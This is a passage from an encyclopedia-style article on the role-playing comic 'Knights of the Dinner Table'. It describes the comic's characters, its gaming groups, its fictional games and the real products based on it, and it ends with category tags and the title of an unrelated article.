He is also a sucker for the local game-shop owner, "Weird Pete" Ashton (see "The Black Hands Gaming Society", below), who constantly finds ways to sell him new or over-stocked product on the basis that it is just what B.A. needs to spice up his campaigns. B.A. was supposedly based on Jolly Blackburn himself. From late 2005 to early 2006, B.A. took a furlough from GMing, having seen too many of his hard-worked campaigns reduced to rubble; the last such disaster before his furlough was a difficult situation revolving around two self-aware swords. His place behind the GM screen was temporarily taken by Brian VanHoose. B.A.'s return to the gamemaster's seat was heralded by his acquisition of a copy of the infamously deadly Temple of Horrendous Doom HackMaster scenario created by "Weird Pete". He has since taken a more hardball approach in the hopes of reining in the power gaming that wrecked most of his previous adventures.
Robert Samuel "Bob" Herzog
Bob lives for gaming. He is a member of the "Old School" style of playing, which revolves around killing people and breaking things. His short temper has led him into trouble on many occasions. He reacts to most encounters with "I waste him/her/it with my crossbow!". Bob is extremely protective of his large dice collection. At one point, Bob came into conflict with his father over gaming and was given the option to straighten up and give up gaming, or move out. Being a true gamer, Bob did indeed move out, and is currently attempting to live on his own, but tends to spend his rent money on gaming paraphernalia. Bob's favourite character in fantasy campaigns is a dwarf named Knuckles (ranging from Knuckles, King of the Wall-climbers to Knuckles the Eighth), who rides a mule named "Little Mike" which he believes to be a "Dwarven Warhorse."
Bob is in a relationship with Sheila Horowitz, a member of another Muncie gaming group, the Dorm Troopers; recent issues have shown the two apparently living together. Bob currently works for Weird Pete at the till, getting paid in gaming stock each week, because Weird Pete cannot afford to pay him in actual money. Bob has few qualms with this arrangement, and his enthusiasm for it has even drawn compliments from Sara.
David "Dave" Harcord Bozwell
The youngest of the Knights, Dave is a student at Ball State University, where he studies Cultural Anthropology and Dance Theory (the latter for the purpose of meeting girls). He originally showed up just for the food, but really got into the game despite a bad first encounter with Johnny (a former Knight who cheated Dave out of a priceless gem). Dave is the typical "Hack-N-Slash" player, who becomes bored easily in non-action situations. When faced with talking things through (at which he is poor), or fighting, Dave chooses the latter. Dave, until recently, played a character by the name of El Ravager, wielding a coveted Hackmaster +12 sword named "Tremble". He lusts to own a god-level Magic Sword, but dreads the possibility of such a blade having its own ideas of what it is to be used for.
More recently (late 2006) in B.A.'s newest campaign, Dave has changed tactics (in part thanks to B.A.'s new hardball rules) and is playing a magic-user named El Mardico with, it must be said, some margin of success. Brian has therefore provided Dave with tutelage on how to properly run a mage – for a small fee. Dave was once involved with local Game Master Patty Gauzweiller; he later broke it off but she still had feelings for him, leaving him a target for her flirtatious tactics. This, however, seems to have disappeared with time.
Sara Ashlyn Felton
B.A.'s cousin Sara, the only female member of the group, prefers games with a focus on role playing rather than the pure action. Often, she tries to solve issues in-game through negotiation, while the others prefer violence. Exactly how she, playing a 'good' character, came to unleash upon the game-world a blood-thirsty pack of pit bulls to attack and devour anything alive they come across (and quite a few not-alive things as well) is an entirely different story, and one Sara would like the world to forget about (even if she never will). Usually the voice of reason, Sara has reflexes that would scare a striking cobra and has been known to have a hair-trigger temper on certain subjects (sexist remarks being perhaps the foremost); Bob, Dave and Brian have all had their shirt collars wrenched by a fuming Sara at least once.
Sara's trademark characters are generally (fully clothed) female barbarians, the most noteworthy of which are probably Zayre and Thorina. She also has the distinction of being the person that broke Brian's undefeated streak at Risque (a parody of Risk). Brian is not fond of being reminded of this. Sara was supposedly based on Jolly Blackburn's wife, Barbara Blackburn.
Brian Montgomery VanHoose
Brian is the rules lawyer and powergamer of the group. A web designer and miniature painter, he lives alone in a house inherited from his parents. He can quote rules and supplements down to page and paragraph/footnote numbers, and bend and abuse this knowledge to his advantage, at times at the expense of other players. He meticulously hands down notes of earlier adventures to his characters' descendants, thereby giving them in-game access to knowledge they otherwise would not possess, and has been known to tattoo his character's spells on fellow party-members' backs as a contingency plan, making them into walking grimoires. Brian is another person said to keep a grudge so long he has a regular account at the taxidermist's shop. In addition, when he does get pushed too far (either by a carefully constructed plot falling apart or a bout of in-game backstabbing), he has been known to flip the table in a moment of rage.
His weaknesses include a miserly streak that makes him charge other players 15 cents apiece for character sheets (and non-KoDT affiliated gamers 25 cents), and a love for dogs that B.A. can exploit to lead him by the nose towards traps and misfortunes. Brian's trademark characters are wizards, all bearing the name Lotus. His best-known character is Teflon Billy, a nickname given by the group to a character originally named Black Lotus (Black Lotus gives BL, which gives Billy, and "Teflon" refers to the character's uncanny skill at avoiding damage). Formerly a renowned Game-Master, he abandoned the GM's Screen after an unspecified incident at a convention, but has recently taken it up again (after B.A. was burned out by repeated trashings of his best efforts in GMing), to run a complex Cattlepunk campaign. This campaign terminated with the sudden reversal of Brian's meticulous plans, at the hands of an alliance between B.A. and Sara, and an unexpected role-reversal (from cringing dupe to back-shooting plotter) on the part of Bob's character; Brian threw the reins back to B.A., returning to the role of player, saying that he had only GM'd in order to keep his HMPA-GM credentials fully valid.
Brian has also appeared as a tragic character more than once; in his youth, his parents were killed in a car crash, and his uncle managed his inheritance until he turned eighteen. Living on his own, he concocts elaborate fantasies which he narrates to the other players about being taken globetrotting by his uncle for Christmas, or having a girlfriend (see Alexis Marie below), sometimes even making bogus phone calls or actually booking hotel rooms to strengthen the illusion. In one extreme case, Brian has been portrayed as role-playing a date with a doll, which he referred to as "Sara"; in another, when the Knights had met for pizza and were drawing from a prop Deck of Many Things that Brian made and imagining what would happen if the deck was real and affected their real lives, Brian drew the card "the Void" ("Body functions, but soul is trapped elsewhere"), and responded with "That pretty much describes my life already." It has also been suggested Brian's state may be linked to the fact that Brian previously ran six separate campaigns every week, and was paid for GMing, and further that there may be links between this and "the incident" which caused Brian to give up GMing. Recent issues have not mentioned this aspect of the plot, and it may have been dropped, as a number of readers' letters suggested that readers found these developments too disturbing.
On a number of occasions (such as the doll incident mentioned above), Brian has displayed evidence of a severe crush on Sara; he has not, however, ever openly acknowledged this to her.
The Black Hands Gaming Society
Usually represented as the "evil" counterpart to the Knights, as most of their games revolve around the PCs finding reasons to kill each other before completing the intended adventure. Their membership consists of players who have been rejected from all other local groups, and hence they remain together simply because none of them has anywhere else to go. They are far more results-oriented than the Knights, enforcing demerit policies when Weird Pete is behind the GM screen (often worked off by unpaid labor behind Weird Pete's counter), and holding extensive post-mortems on their game sessions, to see where things could have been done better (usually by the members of the group not slaughtering one another's characters for minor infractions of local "rules", to vent a real-life grudge, or to gain experience points needed to advance their own character a level or two). They are especially prone to do this to "new" charactersmost all of them have a psychological "button" which triggers a desire to execute a character based solely on race, attitude or type of clothing (e.g. looking like the character might be an assassin).
Victor "Nitro" Fergueson – Former Marine and the current GM of the Black Hands; he resorts to increasingly contrived methods to keep the group in order, including using demerits, using incentives, and forcing players to wear "hubcaps of shame" if warranted. Supposedly earned his name after an incident taking part in the steam tunnels under the local University where Nitro attempted to run a "live action" session. For some reason yet to be fathomed, Nitro has a habit of using deceased celebrities of cult-like status as NPCs in most, if not all, of his games (Andy Warhol, his apparent favorite, springs up everywherein HackMaster, Nitro placed him as the primary deity of his campaign setting, Kraag Wurld). Has little tolerance for stupidity and sucking up (usually done at the same time by Newt), and can quickly slip into a drill sergeant-esque tirade that would make R. Lee Ermey proud. Nitro was supposedly based on a real person who Jolly met at a gaming club, who really was nicknamed Nitro.
Pete Ashton – known to the gaming community as "Weird Pete"; owner of the local game shop, the "Games Pit" (originally called the "Games Pit Stop"). A player in the Black Hands, although he has occasionally acted as GM for both them and other groups in the comic, usually running his trademark "never-completed" adventure The Temple Of Horrendous Doom (a reference to a pair of real D&D modules, Tomb Of Horrors and The Temple of Elemental Evil) which "no-one has ever completed without dying". In fact, the majority of the adventure requires players to take control of disembodied spirits; thus "dying" and being reborn is part and parcel of completing the adventure. Weird Pete generally forces players to sign a non-disclosure contract before playing, as he enjoys the mystique that has evolved around the adventure. Weird Pete also devised a "demerit" system for penalizing players when he is GMing, which can be worked off with time running the front counter of the "Games Pit".
Weird Pete is a ruthless salesman and has no qualms about feeding his friends and customers a line of bull about the virtues of his wares; he has a particular talent for convincing B.A. that a given product or service is just what B.A. needs for his game. However, Pete is also a poor businessman, willing to shell out for whatever seems to be "the next big thing" and taking the fall when the product flops; he is often as vulnerable to the sales pitches of game manufacturers as his customers are to his own "salesmanship".
Newt Forager – a small and rather whiny and tricky player who invariably plays evil, mysterious loners with hidden agendas, all of whom are blood related so that he can share in-game information between them. The only child of a career military family, Newt bounced from base to base while he was young, which is perhaps the reason he has a hard time making friends. He has gravitated to the Black Hands because no other group will let him in (he played once with B.A. and the Knights when Bob was unable to game, and proceeded to try to rob everybody just to load up on treasure and experience for another GM's game he was aiming for). Since joining the Black Hands he has acquired an ongoing hatred of Stevil, mostly due to in-game interpersonal warfare and vendettas. Newt's first appearances with the Black Hands were initially believed by several KoDT readers to be examples of "newbie-bashing" (mistreatment of players who are new to a game or group, and are thus at a disadvantage); however, the creators behind the Knights point out that Newt's anti-social and selfish tendencies both in and out of character put him on an even footing with the Black Hands from the start, and that sooner or later, Newt invariably gives as good as he gets where his fellow players are concerned.
Gordo Sheckberry – a more roleplay focused player who usually plays female characters, most notably female pixie fairies who are dramatically underpowered compared to the other characters in the campaign. Gordo uses a wheelchair and has full lifetime disability, but considers this a bonus as it enables him to game almost daily with different groups. He is easily recognized by his Coke-bottle glasses and bad toupee. Gordo has a degree in Chemical Engineering, and is rumored to have cooked up the batch of C-4 used in an attempt to breach the steam tunnels (the incident that gave Nitro his nickname).
Stevil Van Hostle – also known as Stevil Van Hostile, Evil Stevil or Bitter Stevil, Stevil is a tech-support worker who commutes from Indianapolis to game sessions and is quick to jump viciously on any grudge in the game (sometimes accompanied by his signature gripe, "I can't believe I drove forty-five frickin' miles for THIS!"). On occasion, he has been known to deliberately trash entire parties and campaigns simply because another player's character won over on him. He has an ongoing grudge against Newt which started when Newt first joined the group; Stevil's character challenged Newt's to "swing at him with a stick" to test his combat prowess (after Newt refused to describe his character in game-statistic terms). Newt's character knocked out Stevil's with his first blow, and it was discovered that Stevil had assumed that a "stick" would be a small twig or similar, whereas the "stick" Newt's character had actually used was a full-length pole resembling a log. Outside the Black Hands' table, Newt merely brags that he knocked Stevil out with an ordinary stick, which only serves to further annoy Stevil.
Hard Eight Enterprises
In the KoDT world, Hard Eight Enterprises is the creator of the Hackmaster, Cattlepunk, Space Hack, and Scream of Kachooloo gaming systems. Well respected by all of Muncie's gaming groups (usually, anyway), the company calls the shots. Hard Eight Enterprises runs the tournament-level Hackmaster games; one year's semi-finals resulted in the disqualification of the Black Hands and in the Untouchable Trio (Plus One) causing Timmy Jackson to cry. Hard Eight runs the annual Garycon game convention; there is now a real-world convention with this name, held in memory of Gary Gygax in Lake Geneva, Wisconsin.
Gary Jackson – President and founder of Hard Eight, Gary Jackson designed and created Hackmaster (a parody of Dungeons & Dragons). His name combines those of Gary Gygax and Steve Jackson, two noted RPG designers. Gary Jackson has always been two things—first and foremost a gamer, but second and not distantly behind that at all: a businessman. Some of Hard 8's best and worst products were designed by Gary, including the One-Legged Dwarf Kits. Gary has a son by the name of Timmy (Timmy Jackson in full), who is also involved in the family business. However, Timmy is somewhat young, and a lot of the ideas he comes up with are met with spite and disgust. Gary Jackson allegedly died in issue #53 in a plane crash. Because of controversy surrounding the new edition of Hackmaster, Brian and Bob got into a vehicle and drove up to Hard Eight to confirm this. Despite their shock and horror at his "death," the two rubbed several of their dice on Gary, believing this would endow good luck; in fact it cursed the dice. Suddenly, in issue #149, Gary emerged from hiding (after having faked his own death to avoid gambling debts), and started his own game company, purchasing several of his game lines from Hard Eight, now controlled by Heidi. Eventually, he merges his new company with Hard Eight, recombining their old intellectual properties, but must work under Heidi, who still owns it.
Heidi Jackson – estranged wife of Gary Jackson, owner of a regular publishing company, Paperback Werks, and owner of Hard Eight since the (faked) death of Gary Jackson – although she rarely actually showed up at Hard Eight, instead holding telephone conferences with the staff. Heidi is a hard-nosed businesswoman who cares nothing for games or gamers, and imposed continuously harsher deadlines for Hard Eight to show greater and greater profit margins, having threatened more than once to close down the company if it failed to show sufficient growth. Many of the employees dislike Heidi, but Jo Jo (below) has accepted that her business attitude is only acknowledging and dealing with a weakness that was already there. Heidi began demanding changes in Hackmaster to the point that it resembled one of the romance/adventure novels her company publishes. (Some changes suggested by Heidi appear to be not-so-subtle jabs at the real-world alterations made in Dungeons & Dragons 4th Edition.) After Heidi sold off several Hard Eight assets, which were purchased secretly by Gary, Gary found that his employees had signed non-compete contracts with Heidi. Gary was able to "charm" Heidi into re-merging the companies.
Timmy Jackson – Son of Gary and Heidi Jackson. Over the years, Timmy earned the nickname of "Table Happy," because of his munchkin ways. He was also referred to on occasion as "Timmy the Rules Mangler." Timmy was intended to one day inherit Hard Eight. Timmy used to participate in the creation of gaming systems, including Cattlepunk. However, Timmy was a munchkin (i.e. power gamer) and his products had poor reputations. Following the return of Gary Jackson, it has been implied that Timmy has lost interest in role-playing games and has grown into a typical teen jock, more interested in football and girls.
Jo Jo Zeke – Jo Jo was (until his supposed demise) Gary Jackson's best friend and he assumed daily management of Hard Eight after Gary's "death." Jo Jo was once forced to accompany Timmy Jackson to host a Hackmaster tournament because Gary was busy. In the aftermath, Jo Jo grabbed a then-crying Timmy and retreated back to Hard Eight as fast as possible. Everyone found out why very quickly, for the prize of the tournament turned out to be a $1500 certificate for One-Legged Dwarf Kits and Spelljacked cards. This development enraged even those who had lost the tournament, and a riot broke out. Jo Jo was pressed by the Hard Eight staff to stand up to Heidi Jackson's more ridiculous changes to HackMaster. Jo Jo presented their case and was subsequently fired. He created his own gaming company, but was then brought back on board when Gary returned.
Patty's Perpetrators
Patty's Perpetrators (Patty's Perps for short) are one of the newest sanctioned groups in Muncie recognized by the HMPA. Patty's Perps have the stigma of being the very bottom of the barrel (i.e., they take in those whom no one else will accept, like Crutch).
Patty Gauzweiller – currently teaches a Kindergarten class in Muncie. She used to belong to the Black Hands before forming Patty's Perpetrators (or more commonly "Patty's Perps"). She often brings her "teaching tools" from her classroom to the gaming table (time outs, for example). Patty used to be in a relationship with Dave. They dated for a number of months before Dave decided to break up with her. In more recent times, after a series of misunderstandings and an eventual co-GM arrangement with B.A. during a massive PvP war at the Knights' table, surprisingly, Patty and B.A. appear to be on the road to an actual relationship.
Leslie "Crutch" Humphries – Crutch is an ex-con who's gotten two "strikes" and been put on notice. If he commits a crime again, he goes to prison for good. He's often found at Hawg Wallers (though legally he is not allowed to be in bars by the terms of his probation, the police don't usually go to Hawg's). Despite his criminal record, it's apparent to those who know him that he mostly has a good heart. He is a very loyal friend—though he often gets in trouble for his loyalty. Crutch discovered role-playing by accident, when he mistook a game of Cattlepunk the Black Hands were playing in Hawg Wallers for an actual meeting to plan a heist; when he was told the truth, he decided he would like to see how the heist turned out in the game anyway and was hooked on Cattlepunk. However, Crutch also had a social stigma of being cutthroat and was rejected from the Knights, as well as from the Black Hands. He finally found a home with Patty's Perps, although he had to try hard to earn the acceptance and approval of the other players. He has learned much about fantasy role-playing and teamwork with fellow players in his time with the Perps, and in a recent Hackmaster Tournament/Grudge Match, Crutch was the only member of the group to advance to the finals. Moreover, it was his act of self-sacrifice that enabled Sara Felton (another finalist among the three teams that called the Grudge Match) to reach the final goal and win the game. Crutch eventually became an HMA certified gamemaster, drawing on his criminal background to run a surprisingly popular (and extremely lethal) Crime Nation campaign.
Mona "Mo" Wert – Mona has a lot of time to game since her children are grown up and she received a large inheritance from a great-uncle, as well as her husband's departure. She is proud of "answering to no one" and being a "free spirit". She is honest, blunt, and rather ruthless, but most people still consider her enjoyable to be around. In her spare time she does volunteer work and met Patty working at her kindergarten.
Eddie "Tank" Ramirez – Eddie acquired the nickname "Tank" in high school as the League Commissioner for his Fantasy Football League. He is very proud of his character – Kraven the Frost Giant thief. He believes he is the only player in the country playing a giant thief, although there are rumors that someone in Belize is playing a Hill Giant assassin. He has assumed the role of Crutch's "tutor", teaching him the intricacies of roleplaying and "playing well with others". As a child, Eddie was extremely shy, and Patty's Perps was the only group that accepted him. Patty has been working on "coaxing him out of his shell" and he started working out at Nitro's gym regularly after she offered in-game incentives for exercising.
Chad Aguilar – Chad is a graduate student at Ball State University, working as a disc jockey to earn needed money. He is known for having a short temper; he is often sent to Patty's time-out corner, and if he leaves it prematurely, he'll lose a level. When he started playing Hackmaster, his age (13) made it difficult to find an accepting group, but he was accepted into Patty's group. He now plays with his love interest, Reese, who is a naive vegan peacenik completely unsuited for the brutal world of Hackmaster. After having a baby son ("Peeta..."), they ended up sharing a pixie fairy character with multiple personalities.
Other groups
The Dorm Troopers, Logan's Heroes and Slacker's Hackers are some of the other local gaming groups that the Knights come across at intervals, most notably in the incident of the Player Exchange Program (and the resulting intergroup grudge match). In this, certain Game Masters conspired to arrange for the annihilation of competing groups' characters (so that their bodies could be looted for plunder) by switching players into other groups' games where, separated from their regular comrades, they could be killed off. The ultimate plan was to eliminate competition in an upcoming local HackMaster tournament, as well as to use any magic items and other enhancements looted from other characters to win the tourney.
Other notable characters from the Muncie gaming community include:
Bridgette Keating, a beautiful woman who wears skimpy costumes at conventions and delights in using her appearance to manipulate the "geeks" (not least by involving them in the LARP "Vampyres: Lords of Darkness" and then using them for manual labor).
Earl Slackmozer, an occasional freelancer for Hard Eight Enterprises and a one-time rival of B.A. B.A. didn't care for one of Earl's modules and the two butted heads for a while, but have since learned to respect each other (more or less).
Sheila Horowitz was introduced to gaming at the Knights' table (though she never became an official member of the group) while dating Dave Bozwell, and once got in a fistfight with B.A. when he accused her of in-game cheating. She is currently a member of the Dorm Troopers, and is cohabiting with Bob Herzog. Sheila is arguably a vital part of Bob's maintaining his independence from his father, as she initially took something of a "mother hen" attitude with Bob. Since moving in together, it is clear that Sheila is the dominant personality in the relationship, limiting Bob's spending money and assigning him household chores (although at the latest GaryCon she also covertly arranged for Bob to fulfill his ambition of winning a giant D20, even if she then had to manipulate him into not displaying it on a table where she kept a family photograph). This relationship took a dramatic nosedive after Bob got suckered into a couple of Brian's schemes to 'get one over' on Hard 8, culminating in Bob losing Sheila's trust over rent money spent on Hacker-Snacks.
Hunter and Croix are Bob Herzog's nephew and niece (respectively), whom he has introduced to gaming. Hunter was part of Nitro's PeeWee team that competed in HackMaster tournaments, and later appeared in Wave 1 of Bob Herzog's intercampaign invasion during the PvP war against Carvin' Marvin, Brian, and Sara.
Two fictional groups that are frequently referenced in stories are the Hackmaster Association for gamemasters (HMA) and Hackmaster Players' Association for players (HMPA). They act as networking organizations for the two types of participant, perform lobbying activities on behalf of their groups to Hard Eight Enterprises (e.g., to advocate for rule changes that benefit their members), arbitrate disputes, and issue rulings that are binding on their members. The HMA also serves as an accreditation body for gamemasters. The HMA and HMPA are examples of the exaggerated level of organization of the RPG hobby in the comic; another is the fictional Gamer Temps company that provides, for a fee, drop-in temporary players for campaigns when a regular player is absent (minor character Ty Ferfel was introduced as a Gamer Temps employee).
Miscellaneous characters
Characters who are not part of a gaming group.
Squirrely – Weird Pete's pet chimpanzee, he can be considered a security measure. Squirrely is actually a hyper-intelligent experimental animal formerly of a U.S. Government research facility; how he escaped is somewhat of a mystery, and one Weird Pete will likely never solve, mainly because he doesn't know or even care. He works as a sort of gofer at the Games Pit, running errands on his scooter or sorting inventory. He has, on occasion, sat in at the Knights' table, substituting for one of the regulars (though never, so far, for Sara or Brian). He tends to do very well, because Weird Pete keeps his cage in the room he lets gamers hire for sessions, so Squirrely (who games as "Squire Lee", a name Pete had also used to apply for a credit card) has seen most of the commercial modules played already, and knows where the treasure, monsters and traps are. Squirrely is also a rather heavy smoker—something that can create friction at the Knights' table, due to Brian's bad reactions (whether physical or psychosomatic) to cigarette smoke.
Erik Bouchard – A Canadian gamer who showed up at Gary Jackson's funeral and rubbed dice on Gary, right in front of the entire Hard 8 Staff. He later appeared as a "hired gun" during the grudge match that resulted from the Player Exchange Program.
In-game (non-player) characters
The Knights themselves have encountered several recurring non-player characters in their (various) roleplaying campaigns. Among these are:
(Li'l) Knobby Foot, the Untouchable Trio (Plus One)'s one-time loyal halfling torch-bearer, who fled with certain of the UT+1's possessions, including Knuckles' "dwarven warhorse" and El Ravager's "magic cow," when the group was in dire straits and Knuckles, El Ravager, and Teflon Billy decided to use Knobby Foot as food. They also once shaved his head and branded "slacker" on his forehead for falling asleep on guard duty. He defected to Sergeant Barringer during the Bag Wars, and later inherited his position as lord of Barringer City. He eventually became a sort of lich and served a villainous role during a major campaign to destroy Bag World.
Lord Gilead, formerly the henchman of one of Sara's HackMaster characters, who became a charismatic noble lord after an unknown, potentially dangerous magical helmet, which the Knights insisted he be the one to try out, turned out to be the legendary Helm of Lordship. He now rules the land of Faengerie and looks down on the propensity of Teflon Billy, Knuckles and El Ravager to burn and slaughter their way through whatever kingdom they happen to be in. Gilead is known to be a "favored NPC" of B.A., who uses him to foil many of the players' more absurd large-scale plans and actions.
Chelsie the Magic Cow, once owned by El Ravager and subsequently eaten by Li'l Knobby Foot. Originally she was an ordinary cow, grazing by the side of the road as mere flavor text. El Ravager insisted on investigating, and B.A.'s attempts to dissuade the players were met with more fervor and suspicion ("there must be something really special about that cow if he's trying to keep us away from it"). When Teflon Billy used Detect Magic on the cow, B.A. sarcastically declared that it radiated a blinding magical aura. El Ravager laid claim to the cow, named her Chelsie, and over the course of several adventures sought to determine her supposed magic abilities; sadly, he never succeeded. Poor Chelsie met her end as a meal and warm clothing for Li'l Knobby Foot when he fled for his life from the Untouchable Trio. There is a similar story regarding Knuckles and a mule, though that was a case of deliberate trickery on the GM's part; B.A. convinced Knuckles (Bob's character) that "Little Mike" was actually a dwarven warhorse. Mike was also stolen by Knobby Foot, but was kept on as the former hireling's steed when Knobby Foot joined the Barringer rebellion. (Oddly enough, when KenzerCo published the actual rulebooks for HackMaster, the dwarven warhorse showed up on the equipment lists of the Player's Guide, along with a plethora of other items mentioned in the comic. However, it contains no references to magic cows, so Chelsie's special abilities remain a mystery.)
"Red" Gurdy Pickens, most often a bar-owner or piano player and nemesis of the Knights' Cattlepunk characters. From the players' perspective, the most feared of all of B.A.'s recurring NPCs; he is often recognized by description before being mentioned by name, eliciting a cry from the players (in unison) of "RED GURDY PICKENS?!". A Canadian descendant of Red even showed up in B.A.'s Hacknoia campaign to plague the Knights' agent characters. He was Resurrected yet again as the sheriff (and primary antagonist for the players) of the town of Lazarus, during Brian's Cattlepunk campaign. Red Gurdy Pickens appears as an NPC in Aces and Eights, the real-life analogue to Cattlepunk.
Alexis Marie (aka Lexie), supposedly Brian's girlfriend, but never seen by anyone else in the flesh. He talked about her larger-than-life adventures and careers for over two years before Bob and the other Knights decided the ruse was out of control; Brian had claimed they were engaged and even sent out wedding invitations. After a long, drawn-out intervention-type discussion, Brian was forced to admit that Alexis was not real. In a dramatic emotional outburst, he confessed he had created his own fantasy world, "Brian's Life", in order that he could feel loved (a sort of escape from the 'harsh edges' of the real world). Alexis is now a touchy subject among all the Knights, and any mention of her at the table tends to result in Brian unleashing a furious beatdown on the person who mentioned her.
Jonid Coincrawler, a gnomish thief and illusionist, who devises elaborate schemes to separate the Knights from their gold. In many cases, these schemes would not have worked as well as they did if it were not for the Knights simultaneously attempting an equally elaborate scheme to profit from a situation. In the "reality" of the comic strip, Jonid seems to be an established character from official HackMaster material rather than an original creation of B.A.'s, as he is mentioned in documents distributed by Hard Eight Enterprises.
Sergeant Barringer, the leader of a group of hirelings that the UT+1 placed inside a magical bag of holding in order to transport them more easily (in other words, less expensively than buying them all horses). After Teflon Billy, who was in charge of the bag, forgot to feed the hirelings or let them out of the bag for several months, he was shocked to discover that, rather than dying, they had created a fortress and society within "Bag World", living off the other resources that the Knights had stored there. This led to a conflict and eventually to several full-scale "Bag Wars" in which the Knights attempted to reclaim their items. In a more recent storyline, a campaign taking place generations after the end of the "Bag Wars" features the Knights' current characters entering Bag World and encountering societies descended from veterans of the wars; one of these settlements was "Barringer City," ruled by a corrupted Knobby Foot.
"Carvin' Marvin", an intelligent artifact-level magic sword who is completely insane and delights in having his wielder kill and maim anyone nearby and/or themselves. On occasion, however, he can be persuaded to pursue a more useful goal, and on those occasions serves as a very powerful and effective weapon. The last time Marvin was wielded resulted in a clash between him and Tremble, the Hackmaster +12 that (played by Nitro) had asserted control over Dave's character, with the result that every PC died and Marvin absorbed Tremble's power as his own. He waited centuries at 'Meatgrinder Rock,' luring in unsuspecting treasure hunters in and destroying them to create bodies for a mighty undead army. Eventually, the party returned to investigate the sword and Sara and Brian's characters got too close and became dominated by Marvin, who then used them to launch a campaign to conquer Garweeze World.
Pit bulls. The UT+1 discovered that the HackMaster rules allowed pit bulls to be purchased in large quantities from even the smallest village, making them a cheap but effective weapon en masse (though somewhat uncontrollable, since the cheap price was for untrained dogs). Unfortunately, when one of Sara's characters purchased a large group to run off guards transporting the other three player characters to justice, the dogs became feral and started gathering up every other pit bull in the country, one village at a time, until a vast pack of the dogs ('the Doomsday Pack') was killing everyone and every living thing which they came across, changing the face of Garweeze World.
Fictional games
Since the comic centers around a community of role-playing gamers, the characters are seen playing many games that are analogues of real-world games (some of which were then published as real-world games). They include:
Hackmaster, a fantasy role-playing game like Dungeons & Dragons, but even more baroquely complex. Hackmaster games are typically set in Garweeze Wurld, a reference to Gary Gygax's World of Greyhawk campaign setting. It is the game most often shown being played. Kenzer and Company has published multiple real-world versions of the game, including supplements with names taken from the comic (e.g. the Hacklopedia of Beasts guides to the monsters of Garweeze Wurld). In the very early Shadis scripts, the game the group plays is apparently called Dung & Dragons (although this is only seen on the back of B.A.'s GM screen). HackMaster is initially described as a home-brewed rule set by B.A., but was later declared to be a published product.
Spacehack, a science-fiction role-playing game like Traveller. Early strips implied this to be exactly the same game as HackMaster with different names, but it diverged later. One early storyline features the Knights' Spacehack characters traveling through a rift in space to Garweeze Wurld, where they encountered their Hackmaster characters. Several single-frame strips referring to SpaceHack were originally advertisement strips for the sci-fi RPG Fading Suns (which otherwise has no relationship to Hackmaster).
Scream of Kachooloo, a horror role-playing game closely modeled on Call of Cthulhu.
HackNoia, a modern-day espionage role-playing game like TSR's Top Secret.
Heroes and Zeroes, a superhero role-playing game like Champions.
Cattlepunk, a Western role-playing game like TSR's Boot Hill. The earliest strips call it Hackmaster: Cattlepunk, implying it may be a supplement or variation on that game. Kenzer and Company has published its own Western-themed game named Aces & Eights: Shattered Frontier.
Crime Nation, a role-playing game where the characters are gang members in a crime-ridden city.
Dawg: The RPG, a role-playing game designed by B.A. Felton in which the characters are dogs of various breeds, similar to Bunnies & Burrows, which featured rabbit characters. It was self-published by B.A. and was a disastrous failure; the one time the group played it, the session consisted almost entirely of making "saving throws versus Canine Compulsion" to keep their characters from acting like actual dogs. It was later picked up by Hard Eight after an intellectual property dispute with Heidi and "tidied up" by Jo Jo Zeke.
Vampyres: Lords of Darkness, a live-action role-playing game like White Wolf's Vampire: The Masquerade.
World of Hackcraft, a massively multiplayer on-line role-playing game set in Garweeze Wurld, modeled on World of Warcraft.
Spelljacked, a fantasy-themed collectible card game like Magic: The Gathering and Spellfire. Spelljacked is depicted as Hard Eight's failed attempt to cash in on the CCG craze; they were later forced to practically give away their remaining stocks of cards.
Fairy Meat, a miniatures game designed by Pete Ashton about cannibalistic fairies. Later published as a real-world game.
Risque, a board game of world conquest modeled on Risk.
Island of Kataan, a board game of building and trading modeled on The Settlers of Catan. When the Knights play it, most of them are baffled by its complete lack of rules for combat.
"TreasonHackers", a RPG that mimics "Paranoia". It only shows up in the animated YouTube videos, and Brain thinks it's a joke due to the high lethality rate.
RoadHack, a post-apocalypse highway game of car-to-car combat a la The Road Warrior, clearly based on Car Wars.
The Great War, an extremely detailed simulation of the First World War, costing several hundred dollars. A number of Muncie gamers formed the "Guns of August Society" to purchase and play it; over the years, all except Weird Pete and Brian have dropped out, and those two have been playing the game, at the rate of one turn per month, for fifteen years. When Johnny Kizinski briefly returned to the Society, he found that Pete and Brian had stopped attacking each other and were continuing to play the game peacefully simply to keep it running: Johnny attacked, upsetting the balance. A reference to the "monster games" of wargaming's past, such as SPI's War in Europe or GDW's Europa Series.
Virulence: The Game of Biological Warfare, a boardgame with both cooperative and competitive elements, centered around keeping a patient alive as it is attacked by various diseases while engineering diseases to attack other teams' patients. Similarly themed to the cooperative board game Pandemic.
Live readings
An event held at the Origins Game Fair, and possibly at other gaming conventions, is the Knights of the Dinner Table live reading. People in attendance put their names into a random drawing. The "winners" go up on stage, sit around a table, and act out the comic book, with hilarious results.
Affiliated products
Several games based on the comic have been published:
The boardgame Orcs At The Gates, published in 1998, and an expansion Orcs: The Reckoning in 1999. The base game won the 1999 Origins Award for Best Fantasy or Science Fiction Boardgame.
The card game Knights of the Dinner Table: HACK!, published in 2001.
Four Lost Worlds gamebooks were published by Flying Buffalo based on the comic's famous "Untouchable Trio +1" (Bob's "Knuckles", Dave's "El Ravager", Sara's "Thorina", and Brian's "Teflon Billy").
HackMaster, a real-world realization of the game played in the comic, was published by Kenzer and Company. Based on the first edition of Advanced Dungeons & Dragons (system used under license), it won the Origins Award for Game of the Year 2001.
In 2000, a monthly spin-off comic was created, titled Knights of the Dinner Table Illustrated, AKA K.ILL. The comic depicts many of the adventures described within KoDT; however, K.ILL shows the player characters' actions rather than those of the players behind them.
In 2018, a Kickstarter-funded live-action show was produced. However, due to the mismanagement and misdoings of the Kickstarter's originator, Ken Whitman, now known as Whit Whitman, the 4 TB hard drive with the footage was lost. Thankfully, a portion of the footage was recovered, and Ben Dobyns of Zombie Orpheus Entertainment was able to make and send the backers a reconstructed version despite having no obligation to do so.
See also
Nodwick, another roleplaying comic strip
Dork Tower, another roleplaying comic strip
The Order of the Stick, another roleplaying comic strip
Eric and the Dread Gazebo, a notorious gaming anecdote that provided the basis for one story in the comic's first issue.
References
External links
Official KoDT homepage
Official "Who's Who" of KoDT
1990 comics debuts
American comic strips
Gag-a-day comics
Origins Award winners
Role-playing game magazines
|
19495707
|
https://en.wikipedia.org/wiki/Comparison%20of%203D%20computer%20graphics%20software
|
Comparison of 3D computer graphics software
